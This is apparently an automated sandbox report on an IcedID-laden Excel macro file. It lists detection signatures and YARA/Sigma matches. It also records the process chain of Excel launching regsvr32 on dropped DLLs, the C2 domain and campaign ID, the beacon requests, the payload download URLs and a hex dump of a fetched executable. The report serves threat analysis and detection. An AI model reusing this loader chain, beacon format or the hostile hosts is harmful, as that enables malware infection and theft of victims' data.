Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Outfordelivery389402.xlsm

Overview

General Information

Sample Name:Outfordelivery389402.xlsm
Analysis ID:444803
MD5:acdff723834c2096a2b6cf764530a39d
SHA1:f73118a481aff1b466d3357ed80ad5dda7bdb082
SHA256:236813afbb9c8784ac18f4653ee4933de94941b17cce4dad97ed1f21d61eb5b1
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapater information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2640 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2824 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2828 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2428 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_IcedID_1Yara detected IcedIDJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2096505255.0000000000190000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
    • 0x27c6:$internal_name: loader_dll_64.dll
    • 0x30b4:$string0: _gat=
    • 0x3114:$string1: _ga=
    • 0x30ec:$string2: _gid=
    • 0x30cc:$string3: _u=
    • 0x3026:$string4: _io=
    • 0x30d8:$string5: GetAdaptersInfo
    • 0x2b16:$string6: WINHTTP.dll
    • 0x27ea:$string7: DllRegisterServer
    • 0x27fc:$string8: PluginInit
    • 0x3080:$string9: POST
    • 0x3140:$string10: aws.amazon.com
    00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
      00000004.00000002.2100767048.0000000003401000.00000004.00000001.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
        00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
          Process Memory Space: regsvr32.exe PID: 2828JoeSecurity_IcedID_1Yara detected IcedIDJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.regsvr32.exe.4d0000.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
            • 0x27c6:$internal_name: loader_dll_64.dll
            • 0x30bc:$string0: _gat=
            • 0x311c:$string1: _ga=
            • 0x30f4:$string2: _gid=
            • 0x30d4:$string3: _u=
            • 0x302e:$string4: _io=
            • 0x30e0:$string5: GetAdaptersInfo
            • 0x2b16:$string6: WINHTTP.dll
            • 0x27ea:$string7: DllRegisterServer
            • 0x27fc:$string8: PluginInit
            • 0x3088:$string9: POST
            • 0x3148:$string10: aws.amazon.com
            4.2.regsvr32.exe.190000.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
            • 0x1bc6:$internal_name: loader_dll_64.dll
            • 0x1f16:$string6: WINHTTP.dll
            • 0x1bea:$string7: DllRegisterServer
            • 0x1bfc:$string8: PluginInit
            4.2.regsvr32.exe.190000.0.raw.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
            • 0x27c6:$internal_name: loader_dll_64.dll
            • 0x30b4:$string0: _gat=
            • 0x3114:$string1: _ga=
            • 0x30ec:$string2: _gid=
            • 0x30cc:$string3: _u=
            • 0x3026:$string4: _io=
            • 0x30d8:$string5: GetAdaptersInfo
            • 0x2b16:$string6: WINHTTP.dll
            • 0x27ea:$string7: DllRegisterServer
            • 0x27fc:$string8: PluginInit
            • 0x3080:$string9: POST
            • 0x3140:$string10: aws.amazon.com

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2640, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 2824

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 4.2.regsvr32.exe.4d0000.1.unpackMalware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
            Yara detected IcedIDShow sources
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2100767048.0000000003401000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2828, type: MEMORY
            Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

            Software Vulnerabilities:

            barindex
            Document exploit detected (creates forbidden files)Show sources
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to behavior
            Document exploit detected (drops PE files)Show sources
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: lsdfik[1].fml.0.drJump to dropped file
            Document exploit detected (UrlDownloadToFile)Show sources
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
            Document exploit detected (process start blacklist hit)Show sources
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
            Source: global trafficDNS query: name: thousandsyears.download
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 13.224.92.73:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.198.51:80

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: astrocycle.download
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 15:43:24 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 6412Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=VYaHfTaTiGvO95MRIBYQi4x1j395FG8acrj4SxWRfuhJlpNjHQS1wbSNoWu%2B%2FJ4VVWSMsUkTlyAD%2FsD32Y%2BUigC9j4pL79FSATfy%2BIIFVKs9%2BlkJ1QKyieO%2B%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a9f2d40e9f2c22-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:7204:49; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=333637373036:416C627573:42414433343246413734333930453842; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
            Source: Joe Sandbox ViewIP Address: 172.67.198.51 172.67.198.51
            Source: Joe Sandbox ViewIP Address: 13.224.92.73 13.224.92.73
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1E52D1C.pngJump to behavior
            Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:7204:49; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=333637373036:416C627573:42414433343246413734333930453842; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
            Source: regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: unknownDNS traffic detected: queries for: thousandsyears.download
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Jul 2021 15:43:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=vMdMK1HG5M0SJ%2FFEEBsIzCUz7xVitHncPf0wKxa%2FaVhf%2F%2Fr8iNE7uf73xwHwcU1zE%2FMreObfjJ3efAEhIRirQq9v14X%2B9fRcqhL0kb9Jdtp%2Bo6vgu5SI%2BcETYhyFRcPyIQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a9f2e779594a61-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
            Source: regsvr32.exe, 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmpString found in binary or memory: http://astrocycle.download/
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: regsvr32.exe, 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmpString found in binary or memory: http://crt.rootg2.amazontrust.com/root
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
            Source: regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
            Source: regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
            Source: regsvr32.exe, 00000004.00000002.2100037178.00000000031F7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: regsvr32.exe, 00000004.00000002.2100037178.00000000031F7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://o.ss2.us/0
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://s.ss2.us/r.crl0
            Source: regsvr32.exe, 00000004.00000002.2097777850.0000000002C20000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: regsvr32.exe, 00000003.00000002.2089572858.0000000001E80000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2096640594.0000000001CC0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2097273567.0000000001C30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
            Source: regsvr32.exe, 00000004.00000002.2100037178.00000000031F7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: regsvr32.exe, 00000004.00000002.2100037178.00000000031F7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: regsvr32.exe, 00000004.00000002.2097777850.0000000002C20000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: regsvr32.exe, 00000004.00000002.2100037178.00000000031F7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpString found in binary or memory: http://x.ss2.us/x.cer0&
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.47/js
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.76
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images
            Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
            Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/directories
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
            Source: regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/psf/null
